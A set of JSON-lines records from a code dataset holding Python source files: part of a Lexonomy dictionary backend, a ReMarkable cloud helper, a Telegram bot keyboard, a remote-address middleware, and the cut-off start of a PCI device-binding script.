\"):\n if w != \"\":\n words.append('[lc=\"'+w+'\"+|+lemma_lc=\"'+w+'\"]')\n ret = re.sub(\" \",\"+\", lemma) + \";q=aword,\" + \"\".join(words) + \";q=p+0+0>0+1+[ws(\\\".*\\\",+\\\"definitions\\\",+\\\".*\\\")];exceptmethod=PREV-CONC\"\n return ret\n\ndef clearRefac(dictDB):\n dictDB.execute(\"update entries set needs_refac=0, needs_refresh=0\")\n dictDB.commit()\n\n\ndef refac(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if len(configs['subbing']) == 0:\n return False\n c = dictDB.execute(\"select e.id, e.xml, h.email from entries as e left outer join history as h on h.entry_id=e.id where e.needs_refac=1 order by h.[when] asc limit 1\")\n r = c.fetchone()\n if not r:\n return False\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n email = r[\"email\"] or \"\"\n doc = minidom.parseString(xml)\n doc.documentElement.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:entryID\", str(entryID))\n #in the current entry, remove all \n _els = doc.getElementsByTagNameNS(\"http://www.lexonomy.eu/\", \"subentryParent\")\n for el in _els:\n el.parentNode.removeChild(el)\n # in the current entry, find elements which are subentries, and are not contained inside other subentries\n els = []\n for doctype in configs[\"subbing\"]:\n _els = doc.getElementsByTagName(doctype)\n for el in _els:\n if el.parentNode and el.parentNode.nodeType == 1:\n isSubSub = False\n p = el.parentNode\n while p.parentNode and p.parentNode.nodeType == 1:\n if p.tagName in configs[\"subbing\"]:\n isSubSub = True\n p = p.parentNode\n if not isSubSub:\n els.append(el)\n dictDB.execute(\"delete from sub where parent_id=?\", (entryID, ))\n # keep saving subentries of the current entry until there are no more subentries to save:\n if len(els) > 0:\n for el in els:\n subentryID = el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n xml = el.toxml()\n if subentryID:\n subentryID, adjustedXml, changed, feedback = updateEntry(dictDB, configs, subentryID, xml, email.lower(), {\"refactoredFrom\":entryID})\n el.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", str(subentryID))\n dictDB.execute(\"insert into sub(parent_id, child_id) values(?,?)\", (entryID, subentryID))\n if changed:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?) and id<>?\", (subentryID, entryID))\n else:\n subentryID, adjustedXml, feedback = createEntry(dictDB, configs, None, xml, email.lower(), {\"refactoredFrom\":entryID})\n el.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", str(subentryID))\n subentryID, adjustedXml, changed, feedback = updateEntry(dictDB, configs, subentryID, el.toxml(), email.lower(), {\"refactoredFrom\":entryID})\n dictDB.execute(\"insert into sub(parent_id, child_id) values(?,?)\", (entryID, subentryID))\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (subentryID, ))\n xml = doc.toxml().replace('', '').strip()\n dictDB.execute(\"update entries set xml=?, needs_refac=0 where id=?\", (xml, entryID))\n dictDB.commit()\n\ndef refresh(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if len(configs['subbing']) == 0:\n return False\n # takes one entry that needs refreshing and sucks into it the latest versions of its subentries\n # get one entry that needs refreshing where none of its children needs refreshing\n c = dictDB.execute(\"select pe.id, pe.xml from entries as pe left outer join sub as s on s.parent_id=pe.id left join entries as ce on ce.id=s.child_id where pe.needs_refresh=1 and (ce.needs_refresh is null or ce.needs_refresh=0) limit 1\")\n r = c.fetchone()\n if not r:\n return False\n parentID = r[\"id\"]\n parentXml = r[\"xml\"]\n if not \"xmlns:lxnm\" in parentXml:\n parentXml = re.sub(r\"<([^>^ ]*) \", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/' \", parentXml)\n parentDoc = minidom.parseString(parentXml)\n # this will be called repeatedly till exhaustion\n while True:\n # find an element which is a subentry and which we haven't sucked in yet:\n el = None\n for doctype in configs[\"subbing\"]:\n els = parentDoc.documentElement.getElementsByTagName(doctype)\n for el in els:\n if el and not el.hasAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\"):\n el = None\n if el and el.hasAttributeNS(\"http://www.lexonomy.eu/\", \"done\"):\n el = None\n if el:\n break\n if el:\n break\n if el: #if such en element exists\n subentryID = el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n # get the subentry from the database and inject it into the parent's xml:\n c = dictDB.execute(\"select xml from entries where id=?\", (subentryID, ))\n r = c.fetchone()\n if not r:\n el.parentNode.removeChild(el)\n else:\n childXml = r[\"xml\"]\n childDoc = minidom.parseString(childXml)\n elNew = childDoc.documentElement\n el.parentNode.replaceChild(elNew, el)\n elNew.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", subentryID)\n elNew.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:done\", \"1\")\n else: #if no such element exists: we are done\n els = parentDoc.documentElement.getElementsByTagName(\"*\")\n for el in els:\n if el.getAttributeNS(\"http://www.lexonomy.eu/\", \"done\"):\n el.removeAttributeNS(\"http://www.lexonomy.eu/\", \"done\")\n parentXml = parentDoc.toxml().replace('', '').strip()\n # save the parent's xml (into which all subentries have been injected by now) and tell it that it needs a resave:\n dictDB.execute(\"update entries set xml=?, needs_refresh=0, needs_resave=1 where id=?\", (parentXml, parentID))\n return True\n\ndef resave(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n c = dictDB.execute(\"select id, xml from entries where needs_resave=1 limit 12\")\n for r in c.fetchall():\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n xml = re.sub(r\"\\s+xmlns:lxnm=['\\\"]http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"']\", \"\", xml)\n xml = re.sub(r\"^<([^>^ ]*) \", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/' \", xml)\n dictDB.execute(\"update entries set needs_resave=0, title=?, sortkey=? where id=?\", (getEntryTitle(xml, configs[\"titling\"]), toSortKey(getSortTitle(xml, configs[\"titling\"]), abc), entryID))\n dictDB.execute(\"delete from searchables where entry_id=?\", (entryID,))\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True), 1))\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True).lower(), 1))\n headword = getEntryHeadword(xml, configs[\"titling\"].get(\"headword\"))\n for searchable in getEntrySearchables(xml, configs):\n if searchable != headword:\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?,?,?)\", (entryID, searchable, 2))\n if configs[\"links\"]:\n updateEntryLinkables(dictDB, entryID, xml, configs, True, True)\n dictDB.commit()\n return True\n\ndef getEntryLinks(dictDB, dictID, entryID):\n ret = {\"out\": [], \"in\": []}\n c = dictDB.execute(\"SELECT * FROM linkables WHERE entry_id=?\", (entryID,))\n conn = getLinkDB()\n for r in c.fetchall():\n ret[\"out\"] = ret[\"out\"] + links_get(dictID, r[\"element\"], r[\"txt\"], \"\", \"\", \"\")\n ret[\"in\"] = ret[\"in\"] + links_get(\"\", \"\", \"\", dictID, r[\"element\"], r[\"txt\"])\n return ret\n\n\ndef updateEntryLinkables(dictDB, entryID, xml, configs, save=True, save_xml=True):\n from xml.dom import minidom, Node\n doc = minidom.parseString(xml)\n ret = []\n for linkref in configs[\"links\"].values():\n for el in doc.getElementsByTagName(linkref[\"linkElement\"]):\n identifier = linkref[\"identifier\"]\n for pattern in re.findall(r\"%\\([^)]+\\)\", linkref[\"identifier\"]):\n text = \"\"\n extract = extractText(el.toxml(), pattern[2:-1])\n extractfull = extractText(xml, pattern[2:-1])\n if len(extract) > 0:\n text = extract[0]\n elif len(extractfull) > 0:\n text = extractfull[0]\n identifier = identifier.replace(pattern, text)\n el.setAttribute('lxnm:linkable', identifier)\n ret.append({'element': linkref[\"linkElement\"], \"identifier\": identifier})\n xml = doc.toxml().replace('', '').strip()\n if save:\n dictDB.execute(\"delete from linkables where entry_id=?\", (entryID,))\n for linkable in ret:\n dictDB.execute(\"insert into linkables(entry_id, txt, element) values(?,?,?)\", (entryID, linkable[\"identifier\"], linkable[\"element\"]))\n if save_xml and len(ret)>0:\n dictDB.execute(\"update entries set xml=? where id=?\", (xml, entryID))\n dictDB.commit()\n return xml\n\ndef getEntrySearchables(xml, configs):\n ret = []\n ret.append(getEntryHeadword(xml, configs[\"titling\"].get(\"headword\")))\n if configs[\"searchability\"].get(\"searchableElements\"):\n for sel in configs[\"searchability\"].get(\"searchableElements\"):\n for txt in extractText(xml, sel):\n if txt != \"\" and txt not in ret:\n ret.append(txt)\n return ret\n\ndef flagEntry(dictDB, dictID, configs, entryID, flag, email, historiography):\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n c = dictDB.execute(\"select id, xml from entries where id=?\", (entryID,))\n row = c.fetchone()\n xml = row[\"xml\"] if row else \"\"\n xml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", xml)\n xml = re.sub(r\"\\=\\\"([^\\\"]*)\\\"\", r\"='\\1'\", xml)\n xml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", xml)\n xml = addFlag(xml, flag, configs[\"flagging\"], configs[\"xema\"])\n\n # tell my parents that they need a refresh:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID, ))\n # update me\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n dictDB.execute(\"update entries set doctype=?, xml=?, title=?, sortkey=$sortkey, needs_refac=?, needs_resave=? where id=?\", (getDoctype(xml), xml, getEntryTitle(xml, configs[\"titling\"]), toSortKey(getSortTitle(xml, configs[\"titling\"]), abc), needs_refac, needs_resave, entryID))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"update\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n return entryID\n\n\ndef addFlag(xml, flag, flagconfig, xemaconfig):\n flag_element = flagconfig[\"flag_element\"]\n\n path = getFlagElementPath(xemaconfig, flag_element)\n loc1, loc2 = getFlagElementInString(path, xml)\n\n return \"{0}<{1}>{2}{3}\".format(\n xml[:loc1], flag_element, flag, xml[loc2:])\n\n\ndef getFlagElementPath(xema, flag_element):\n result = getFlagElementPath_recursive(xema, flag_element, xema[\"root\"])\n if result is not None:\n result.insert(0, xema[\"root\"])\n return result\n\n\ndef getFlagElementPath_recursive(xema, flag_element, current_element):\n # try all children\n for child_props in xema[\"elements\"][current_element][\"children\"]:\n next_el = child_props[\"name\"]\n\n # if we get to the flag element, return!\n if next_el == flag_element:\n return [flag_element]\n\n # else, recursive search, depth first\n path = getFlagElementPath_recursive(xema, flag_element, next_el)\n\n # if returned is not None, then we found what we need, just prepend to the returned path\n if path is not None:\n return [next_el] + path\n\n # nothing useful found, return None\n return None\n\n\ndef getFlagElementInString(path, xml):\n start_out, end_out = 0, len(xml)\n start_in, end_in = 0, len(xml)\n\n # find each element in path to flag element, start with outmost one\n for path_element in path:\n regex = re.compile(\"<{}[^>]*>([\\s\\S]*?)\".format(path_element, path_element))\n match = regex.search(xml, start_in, end_in)\n\n # we can not find the element, just return to the beginning of outer element\n if match is None:\n return (start_in, start_in)\n\n start_out = match.start(0)\n end_out = match.end(0)\n start_in = match.start(1)\n end_in = match.end(1)\n\n # we found it! Return the span where flag element exists in xml\n return (start_out, end_out)\n\n\ndef readDictHistory(dictDB, dictID, configs, entryID):\n history = []\n c = dictDB.execute(\"select * from history where entry_id=? order by [when] desc\", (entryID,))\n for row in c.fetchall():\n xml = row[\"xml\"]\n if row[\"xml\"]:\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n history.append({\"entry_id\": row[\"entry_id\"], \"revision_id\": row[\"id\"], \"content\": xml, \"action\": row[\"action\"], \"when\": row[\"when\"], \"email\": row[\"email\"] or \"\", \"historiography\": json.loads(row[\"historiography\"])})\n return history\n\ndef verifyUserApiKey(email, apikey):\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=? and apiKey=?\", (email, apikey))\n row = c.fetchone()\n if not row or siteconfig[\"readonly\"]:\n return {\"valid\": False}\n else:\n return {\"valid\": True, \"email\": email or \"\"}\n\ndef links_add(source_dict, source_el, source_id, target_dict, target_el, target_id):\n conn = getLinkDB()\n c = conn.execute(\"select * from links where source_dict=? and source_element=? and source_id=? and target_dict=? and target_element=? and target_id=?\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n row = c.fetchone()\n if not row:\n conn.execute(\"insert into links (source_dict, source_element, source_id, target_dict, target_element, target_id) values (?,?,?,?,?,?)\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n conn.commit()\n c = conn.execute(\"select * from links where source_dict=? and source_element=? and source_id=? and target_dict=? and target_element=? and target_id=?\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n row = c.fetchone()\n return {\"link_id\": row[\"link_id\"], \"source_dict\": row[\"source_dict\"], \"source_el\": row[\"source_element\"], \"source_id\": row[\"source_id\"], \"target_dict\": row[\"target_dict\"], \"target_el\": row[\"target_element\"], \"target_id\": row[\"target_id\"]}\n\ndef links_delete(dictID, linkID):\n conn = getLinkDB()\n conn.execute(\"delete from links where source_dict=? and link_id=?\", (dictID, linkID))\n conn.commit()\n c = conn.execute(\"select * from links where link_id=?\", (linkID, ))\n if len(c.fetchall()) > 0:\n return False\n else:\n return True\n\ndef links_get(source_dict, source_el, source_id, target_dict, target_el, target_id):\n params = []\n where = []\n if source_dict != \"\":\n where.append(\"source_dict=?\")\n params.append(source_dict)\n if source_el != \"\":\n where.append(\"source_element=?\")\n params.append(source_el)\n if source_id != \"\":\n where.append(\"source_id=?\")\n params.append(source_id)\n if target_dict != \"\":\n where.append(\"target_dict=?\")\n params.append(target_dict)\n if target_el != \"\":\n where.append(\"target_element=?\")\n params.append(target_el)\n if target_id != \"\":\n where.append(\"target_id=?\")\n params.append(target_id)\n query = \"select * from links\"\n if len(where) > 0:\n query += \" where \" + \" and \".join(where)\n conn = getLinkDB()\n c = conn.execute(query, tuple(params))\n res = []\n for row in c.fetchall():\n res.append({\"link_id\": row[\"link_id\"], \"source_dict\": row[\"source_dict\"], \"source_el\": row[\"source_element\"], \"source_id\": row[\"source_id\"], \"target_dict\": row[\"target_dict\"], \"target_el\": row[\"target_element\"], \"target_id\": row[\"target_id\"]})\n return res\n\ndef getDictLinkables(dictDB):\n ret = []\n c = dictDB.execute(\"SELECT * FROM linkables ORDER BY entry_id, element, txt\")\n for r in c.fetchall():\n ret.append({\"element\": r[\"element\"], \"link\": r[\"txt\"], \"entry\": r[\"entry_id\"]})\n return ret\n\ndef addAutoNumbers(dictDB, dictID, countElem, storeElem):\n from xml.dom import minidom, Node\n isAttr = False\n if storeElem[0] == '@':\n isAttr = True\n storeElem = storeElem[1:]\n c = dictDB.execute(\"select id, xml from entries\")\n process = 0\n for r in c.fetchall():\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n doc = minidom.parseString(xml)\n allEmpty = True\n for el in doc.getElementsByTagName(countElem):\n if isAttr:\n if el.getAttribute(storeElem) != \"\":\n allEmpty = False\n else:\n for sel in el.getElementsByTagName(storeElem):\n if sel.firstChild != None and sel.firstChild.nodeValue != \"\":\n allEmpty = False\n if allEmpty:\n count = 0\n for el in doc.getElementsByTagName(countElem):\n count += 1\n if isAttr:\n el.setAttribute(storeElem, str(count))\n else:\n for sel in el.getElementsByTagName(storeElem):\n el.removeChild(sel)\n n_elem = doc.createElement(storeElem)\n el.appendChild(n_elem)\n n_elem.appendChild(doc.createTextNode(str(count)))\n process += 1\n xml = doc.toxml().replace('', '').strip()\n dictDB.execute(\"update entries set xml=?, needs_refac=0 where id=?\", (xml, entryID))\n dictDB.commit()\n return process\n","repo_name":"akki2825/english-nyishi-dictionary","sub_path":"website/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":64494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25630633370","text":"\"\"\"\nThis file contains a class and functions that give an easy abstraction\nlayer between me and rmapy. It's not perfect yet by any measure, but quite\nconvenient.\n\"\"\"\nimport uuid\nimport zipfile\nimport os\nimport os.path\nimport shutil\n\nimport rmapy.api\nimport rmapy.document\nimport rmapy.folder\n\nclass ReMarkable():\n\n def __init__(self, templateZip):\n self.templateZip = templateZip\n self.rma = rmapy.api.Client()\n self.rma.renew_token()\n if not self.rma.is_auth():\n raise ConnectionError(\"Cannot connect to ReMarkable cloud, try\"\n \"manually re-registering this device.\" )\n self.discover_filesystem()\n\n def discover_filesystem(self):\n \"\"\"Loads all remote files and folders\"\"\"\n self.collections = self.rma.get_meta_items()\n self.docs = [ d for d in self.collections if isinstance(d, rmapy.document.Document) ]\n self.dirs = [ d for d in self.collections if isinstance(d, rmapy.folder.Folder) ]\n\n def make_labjournal_subfolder(self, name):\n \"\"\"\n Generate new folder in labjournal folder with given name.\n Args:\n name (str): Name for new folder\n \"\"\"\n # first make new folder:\n new_folder = rmapy.folder.Folder( name )\n labjournal = self.find_labjournal_folder()\n result = self.rma.create_folder(new_folder)\n if not result:\n print(\"Warning, folder creation bad return.\")\n new_folder.Parent = labjournal.ID\n self.rma.update_metadata(new_folder)\n self.discover_filesystem()\n\n def prepare_templateZip( self, name ):\n \"\"\"\n Make a zipdoc for uploading based on a local template.\n It changes the UUID so no duplicates.\n Keeps the zip in memory for imediate uploading.\n Args:\n name (str): path to template file\n Returns:\n zipdoc (.zip file): new zip file\n \"\"\"\n loc, newUUID = make_new_UUID( self.templateZip, name )\n zipdoc = rmapy.document.ZipDocument( _id= newUUID, file=loc )\n print(\"Created file \" + str(newUUID))\n # and remove the generated zip...\n os.remove(loc)\n return zipdoc\n\n def empty_dir( self, path ):\n \"\"\"\n Delete the contents of the entire directory. *Not* the dir itsself.\n\n Args:\n path (str): path to dir to empty.\n \"\"\"\n dirID = self.path_to_ID(path)\n dirs = self.get_subfolders(dirID)\n if len(dirs) != 0:\n raise ValueError( \"This folder has subdirs\" )\n docs = self.get_subfiles( dirID )\n if len(docs) == 0:\n pass # should I add a warning or something?\n for d in docs:\n self.rma.delete( d )\n\n def delete(self, doc):\n \"\"\"\n Delete a file in the ReMarakabale cloud at path doc\n\n Args:\n doc (str): Path to file to delete.\n \"\"\"\n self.discover_filesystem()\n splitdoc = splitall(doc)\n dirpath = listToPath(splitdoc[:-1])\n rawdir = self.path_to_ID( dirpath )\n filename = splitdoc[-1]\n try:\n doc = [ f for f in self.docs if (\n f.Parent == rawdir and\n f.VissibleName == filename and\n isinstance(f, rmapy.document.Document) )][0]\n except IndexError:\n raise ValueError( \"{0} could not be deleted: not found in cloud.\".format(doc) )\n self.rma.delete( doc )\n\n def upload( self, path_to_file, parentFolder ):\n \"\"\"\n Upload the file at path_to_file to parentFolder in the\n ReMarkable cloud\n\n Args:\n path_to_file (str): path to file to upload, .pdf or .epub.\n parentFolder (str): path to folder in which to upload, '' is root.\n \"\"\"\n rawDoc = rmapy.document.ZipDocument( doc=path_to_file )\n parentFolderID = self.path_to_ID( parentFolder )\n if parentFolderID != '':\n parentFolder = [ f for f in self.rma.get_meta_items() if f.ID == parentFolderID][0]\n else:\n parentfolder = ''\n self.rma.upload( rawDoc, parentFolder )\n self.discover_filesystem()\n\n def path_to_ID( self, path ):\n \"\"\"\n Convert cloud path to actual id of the folder.\n\n Args:\n path (str): path to dir on rmcloud.\n\n Returns:\n ID (str): ID string.\n \"\"\"\n self.discover_filesystem()\n if path == '':\n return '' # saves some pain probably.\n splitpath = splitall( path )\n splitpath = [''] + splitpath\n IDlist = ['']\n for di in range(len( splitpath )):\n if di == 0:\n continue\n pF = [ f for f in self.rma.get_meta_items() if (\n isinstance(f, rmapy.folder.Folder) and\n f.VissibleName == splitpath[di] and\n f.Parent == IDlist[di-1] ) ] [0]\n IDlist.append(pF.ID)\n return IDlist[-1]\n\n def ID_to_path( self, ID ):\n \"\"\"\n Recursive function that finds the human readable path for an ID.\n Args:\n ID (str): rmCloud ID of a folder or document.\n Returns:\n path (str): Human readable path to ID.\n \"\"\"\n c = [ f for f in self.collections if f.ID == ID][0]\n if c.Parent == \"\":\n return r\"/{}\".format( c.VissibleName )\n else:\n return self.ID_to_path(c.Parent) + r\"/{}\".format( c.VissibleName )\n\n def find_labjournal_folder( self ):\n return [ f for f in self.get_subfolders('') if f.VissibleName == \"Labjournal\"][0]\n\n def get_subfolders(self, parentfolder=\"\"):\n self.discover_filesystem()\n return [ f for f in self.dirs if f.Parent == parentfolder ]\n\n def get_subfiles(self, parentfolder=\"\"):\n self.discover_filesystem()\n return [ d for d in self.docs if d.Parent == parentfolder ]\n\n def listdir(self, parentfolder=r\"/\",filesorfolders=\"\"):\n \"\"\"\n List files and folder in parentfolder. Parentfolder is given as a path, NOT an ID.\n Using filesorfolders you can set to ony show either subfiles or subfolders.\n TODO: filesorfolders is not implemented yet!!\n Args:\n parentfolder (str): absolute path to folder of which to list content\n filesorfolders (str): can be \"\", \"folder\", \"file\", whether to look for files of folders or all.\n Returns:\n list with (ID, path) string pairs\n \"\"\"\n self.discover_filesystem()\n ID = self.path_to_ID(parentfolder)\n files = self.get_subfiles(ID)\n dirs = self.get_subfolders(ID)\n result = list()\n for i in dirs+files:\n visname = self.ID_to_path(i)\n result.append( (i,visname) )\n return result\n\ndef make_new_UUID( zipLoc, newName ):\n \"\"\"\n Rename ReMarkable zip file to another generated UUID so we can do auto-upload.\n\n Args:\n zipLoc (str): path to zip file\n Returns:\n str: path to new zipfile\n \"\"\"\n newUUID = str(uuid.uuid4())\n basedir = os.path.dirname( zipLoc )\n directory_to_extract_to = os.path.join( basedir,\n \"temp\" )\n with zipfile.ZipFile(zipLoc, 'r') as zip_ref:\n zip_ref.extractall(directory_to_extract_to)\n for fileName in os.listdir( directory_to_extract_to ):\n name, extension = os.path.splitext(fileName)\n newFileName = newUUID + extension\n os.rename(os.path.join(directory_to_extract_to, fileName),\n os.path.join(directory_to_extract_to, newFileName))\n newPath = shutil.make_archive( newName, 'zip', directory_to_extract_to)\n shutil.rmtree( directory_to_extract_to )\n return newPath, newUUID\n\ndef splitall(path):\n allparts = []\n while 1:\n parts = os.path.split(path)\n if parts[0] == path: # sentinel for absolute paths\n allparts.insert(0, parts[0])\n break\n elif parts[1] == path: # sentinel for relative paths\n allparts.insert(0, parts[1])\n break\n else:\n path = parts[0]\n allparts.insert(0, parts[1])\n return allparts\n\ndef listToPath(l):\n path = \"\"\n for i in l:\n path = os.path.join(path,i)\n return path\n","repo_name":"WetenSchaap/remarkableAutomation","sub_path":"remarkable.py","file_name":"remarkable.py","file_ext":"py","file_size_in_byte":8341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39650867765","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\nb1 = KeyboardButton('/working_mode')\nb2 = KeyboardButton('/job_places')\nb3 = KeyboardButton('Share Contact', request_contact=True)\nb4 = KeyboardButton('My Places', request_location=True)\n\n\nkb_user = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n\nkb_user.add(b1).add(b2).add(b3).add(b4)\n\n","repo_name":"nurbol0tt/qbot","sub_path":"tgbot/keyboards/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32398589978","text":"# -*- coding: utf-8 -*-\n\nimport settings\n\ndef SetupRemoteAddr(get_response):\n\t\"\"\"\n\tMiddleware that sets REMOTE_ADDR based on HTTP_X_FORWARDED_FOR, if the\n\tlatter is set. This is useful if you're sitting behind a reverse proxy that\n\tcauses each request's REMOTE_ADDR to be set to 127.0.0.1.\n\n\tNote that this does NOT validate HTTP_X_FORWARDED_FOR. If you're not behind\n\ta reverse proxy that sets HTTP_X_FORWARDED_FOR automatically, do not use\n\tthis middleware. Anybody can spoof the value of HTTP_X_FORWARDED_FOR, and\n\tbecause this sets REMOTE_ADDR based on HTTP_X_FORWARDED_FOR, that means\n\tanybody can \"fake\" their IP address. Only use this when you can absolutely\n\ttrust the value of HTTP_X_FORWARDED_FOR.\n\t\"\"\"\n\n\tINTERNAL_ADDRS = getattr(settings, 'INTERNAL_ADDRS', [])\n\n\tdef middleware(request):\n\n\t\trequest.IsBot = False\n\n\t\t# request.META['REMOTE_ADDR'] = \"2601:582:4003:ea10:c97d:259f:ec7e:604a\"\n\n\t\t# HTTP_X_FORWARDED_FOR can be a comma-separated list of IPs. The\n\t\t# client's IP will be the first one.\n\t\tif 'HTTP_X_FORWARDED_FOR' in request.META:\n\t\t\tfor i in request.META['HTTP_X_FORWARDED_FOR'].split(','):\n\t\t\t\ti = i.strip()\n\t\t\t\trequest.META['REMOTE_ADDR'] = i\n\t\t\t\tif i != 'unknown':\n\t\t\t\t\tbreak\n\t\t\t\trequest._broken_remote_addr = True\n\n\t\tif 'HTTP_USER_AGENT' not in request.META:\n\t\t\trequest._broken_remote_addr = True\n\n\t\tfor i in INTERNAL_ADDRS:\n\t\t\tif i.match(request.META['REMOTE_ADDR']):\n\t\t\t\trequest.META['INTERNAL_ADDR'] = True\n\t\t\t\tbreak\n\t\telse:\n\t\t\tif 'INTERNAL_ADDR' in request.META:\n\t\t\t\tdel request.META['INTERNAL_ADDR']\n\n\t\treturn get_response(request)\n\n\treturn middleware\n\n# ----------------------------------------------------------------------------\n","repo_name":"tomaszhlawiczka/tru","sub_path":"dj/mw/SetupRemoteAddr.py","file_name":"SetupRemoteAddr.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4807249224","text":"import sys\nimport os\nimport subprocess\nimport argparse\nimport platform\n\nfrom glob import glob\nfrom os.path import exists, basename\nfrom os.path import join as path_join\n\n# The PCI base class for all devices\nnetwork_class = {'Class': '02', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nacceleration_class = {'Class': '12', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nifpga_class = {'Class': '12', 'Vendor': '8086', 'Device': '0b30',\n 'SVendor': None, 'SDevice': None}\nencryption_class = {'Class': '10', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nintel_processor_class = {'Class': '0b', 'Vendor': '8086', 'Device': None,\n 'SVendor': None, 'SDevice': None}\ncavium_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a04b,a04d',\n 'SVendor': None, 'SDevice': None}\ncavium_fpa = {'Class': '08', 'Vendor': '177d', 'Device': 'a053',\n 'SVendor': None, 'SDevice': None}\ncavium_pkx = {'Class': '08', 'Vendor': '177d', 'Device': 'a0dd,a049',\n 'SVendor': None, 'SDevice': None}\ncavium_tim = {'Class': '08', 'Vendor': '177d', 'Device': 'a051',\n 'SVendor': None, 'SDevice': None}\ncavium_zip = {'Class': '12', 'Vendor': '177d', 'Device': 'a037',\n 'SVendor': None, 'SDevice': None}\navp_vnic = {'Class': '05', 'Vendor': '1af4', 'Device': '1110',\n 'SVendor': None, 'SDevice': None}\n\ncnxk_bphy = {'Class': '08', 'Vendor': '177d', 'Device': 'a089',\n 'SVendor': None, 'SDevice': None}\ncnxk_bphy_cgx = {'Class': '08', 'Vendor': '177d', 'Device': 'a059,a060',\n 'SVendor': None, 'SDevice': None}\ncnxk_dma = {'Class': '08', 'Vendor': '177d', 'Device': 'a081',\n 'SVendor': None, 'SDevice': None}\ncnxk_inl_dev = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f0,a0f1',\n 'SVendor': None, 'SDevice': None}\n\nhisilicon_dma = {'Class': '08', 'Vendor': '19e5', 'Device': 'a122',\n 'SVendor': None, 'SDevice': None}\n\nintel_dlb = {'Class': '0b', 'Vendor': '8086', 'Device': '270b,2710,2714',\n 'SVendor': None, 'SDevice': None}\nintel_ioat_bdw = {'Class': '08', 'Vendor': '8086',\n 'Device': '6f20,6f21,6f22,6f23,6f24,6f25,6f26,6f27,6f2e,6f2f',\n 'SVendor': None, 'SDevice': None}\nintel_ioat_skx = {'Class': '08', 'Vendor': '8086', 'Device': '2021',\n 'SVendor': None, 'SDevice': None}\nintel_ioat_icx = {'Class': '08', 'Vendor': '8086', 'Device': '0b00',\n 'SVendor': None, 'SDevice': None}\nintel_idxd_spr = {'Class': '08', 'Vendor': '8086', 'Device': '0b25',\n 'SVendor': None, 'SDevice': None}\nintel_ntb_skx = {'Class': '06', 'Vendor': '8086', 'Device': '201c',\n 'SVendor': None, 'SDevice': None}\nintel_ntb_icx = {'Class': '06', 'Vendor': '8086', 'Device': '347e',\n 'SVendor': None, 'SDevice': None}\n\ncnxk_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f9,a0fa',\n 'SVendor': None, 'SDevice': None}\ncnxk_npa = {'Class': '08', 'Vendor': '177d', 'Device': 'a0fb,a0fc',\n 'SVendor': None, 'SDevice': None}\ncn9k_ree = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f4',\n 'SVendor': None, 'SDevice': 